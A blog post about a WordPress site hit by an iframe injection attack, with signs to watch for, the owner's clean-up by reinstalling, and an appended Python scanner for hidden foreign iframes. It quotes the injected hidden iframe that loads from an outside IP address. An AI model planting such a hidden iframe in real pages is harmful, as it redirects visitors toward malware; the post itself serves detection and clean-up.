Site Attacked - iframe Injection

Recently, I was informed by a reader of another site I host on this server that it had been the victim of an iframe injection attack. A bit of code had been injected into the website, the main purpose of which is to add a bunch of links (made invisible by CSS) to the bottom of the page.

If you host your own WoW blog, or any site for that matter, you’ll want to keep a lookout for these types of attacks. At best, an injection will damage your search engine rankings. At worst, the injected code could be designed to redirect your users to another malicious site and provoke them to install malware.

What To Look For - How Do I Know I’ve Been Injected

If you don’t know what an iframe injection attack is, here’s what you want to look for.

Somewhere in the page (usually at the very end), a single line of HTML code will be inserted. It will look something like this:

<iframe src="http://124.217.252.62/~admin/count.php?o=5" width=0 height=0
  style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

If you don’t regularly look through the HTML of your page (and really, why should you?), this can be hard to spot. In my case, I noticed a tell-tale sign that may help you identify a problem.

After the site loaded, the browser continued to signal that it was loading content. I thought that one of the ads was still being loaded from a remote location, but when I looked at the status bar I saw that it was loading from the IP address in the iframe code above.

If your site suddenly starts to hang and continue loading something after all of your content has appeared, that’s a good sign that something is wrong and you should check under the hood for this type of problem.

Omg! How Do I Fix This?

First, you’ll want to check out all of the other sites you host on the server. These are often server-wide attacks. The hacker somehow gains access to the server and injects the code into all or most of the files on it.

Basically, you can fix this by eliminating the code. Unfortunately, it may be spread throughout a lot of different files, and I couldn’t figure out which one was the culprit. It had been added to almost all of the index.php files in my WordPress installation, and despite deleting several of these snippets the iframe kept loading.

Instead, I wiped WordPress clean and re-installed it. I exported all of my posts/comments in the dashboard, just in case. I then saved all of the theme files and my plug-in files. I’ll go through these to make sure that the iframe isn’t in any of them.

Then, I uploaded a brand new WordPress installation and went to the upgrade page. I needed to upgrade anyway, so it patched the database… and everything works like new.

You probably don’t need to re-install WordPress (or your own blogging software) to eliminate this, but it may be the easiest method. Just make sure you back up the content first.
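
To find which files carry the injected line described above, including saved theme and plug-in files, a small scanner can walk the site directory and report every hidden iframe that loads from another host. This is an added example, not code from the original post; the extension list and all function names are assumptions, and the sample address used to test it is constructed.

```python
import os
import re
import sys
from urllib.parse import urlparse

# File types to scan: an assumption, adjust for your site.
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".tpl")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def parse_attrs(tag):
    """Return the tag's attributes as a dict with lower-cased names."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag)}

def is_hidden(attrs):
    """True for zero-sized frames or frames hidden through the style attribute."""
    def zero(value):
        return value is not None and value.strip().lower().rstrip("px%") == "0"
    style = attrs.get("style", "").replace(" ", "").lower()
    return (zero(attrs.get("width")) or zero(attrs.get("height"))
            or "hidden" in style or "display:none" in style)

def find_hidden_iframes(text, allowed_hosts=()):
    """Return (line_number, src) for each hidden iframe whose host is not allowed."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(0))
        host = urlparse(attrs.get("src", "")).hostname  # None for relative URLs
        if host and host not in allowed_hosts and is_hidden(attrs):
            hits.append((text.count("\n", 0, m.start()) + 1, attrs["src"]))
    return hits

def scan_tree(root, allowed_hosts=()):
    """Walk root and return {path: hits} for every file with a match."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXTENSIONS):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read(), allowed_hosts)
                if hits:
                    report[path] = hits
    return report

if __name__ == "__main__":
    for path, hits in sorted(scan_tree(sys.argv[1]).items()):
        print(path, hits)
```

Pass the directory to scan as the only argument. The scanner matches iframe tags written literally in a file, so a frame that is assembled by a script at load time will not show up in its report.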

Good luck. Be safe.
